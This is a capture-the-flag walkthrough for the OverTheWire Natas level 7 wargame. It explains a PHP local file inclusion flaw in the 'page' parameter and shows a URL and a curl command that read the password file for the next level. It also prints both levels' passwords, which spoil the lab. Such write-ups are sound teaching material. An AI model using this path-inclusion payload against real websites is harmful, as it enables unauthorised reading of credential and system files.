Overview
| Field | Value |
|---|---|
| URL | http://natas7.natas.labs.overthewire.org |
| Username | natas7 |
| Password | bmg8SvU1LizuWjx3y7xkNERkHxGre0GS |
The page has two navigation links:
index.php?page=home
index.php?page=about
The page parameter controls what content is loaded. The page source contains a hint:
<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->
Hints
Hint 1 — What is the page parameter doing?
The ?page= parameter changes what content is rendered. In PHP, this is commonly done by passing the parameter to an include() or require() call — the value becomes part of the file path. What happens if the value you pass isn't a page name, but an absolute path to a file on the server?
Hint 2 — Where is the password?
The HTML comment tells you exactly where the password file lives: /etc/natas_webpass/natas8. If the include() call doesn't restrict input to relative paths, you can supply that absolute path directly as the page parameter.
Solution
Full walkthrough
Identify the vulnerability
The
?page=value is passed directly into a PHPinclude()without validation. This is a Local File Inclusion (LFI) vulnerability — any readable file on the server's filesystem can be included.Include the password file
Navigate to:
http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8PHP includes
/etc/natas_webpass/natas8and renders its contents inline in the page.
With curl
# Pass the absolute path as the page parameter — the server includes and returns the file
curl -s -u natas7:bmg8SvU1LizuWjx3y7xkNERkHxGre0GS \
"http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8"
Password
natas8: xcoXLmzMkoIP9D7hlgPlh9XD7OgLAe5Q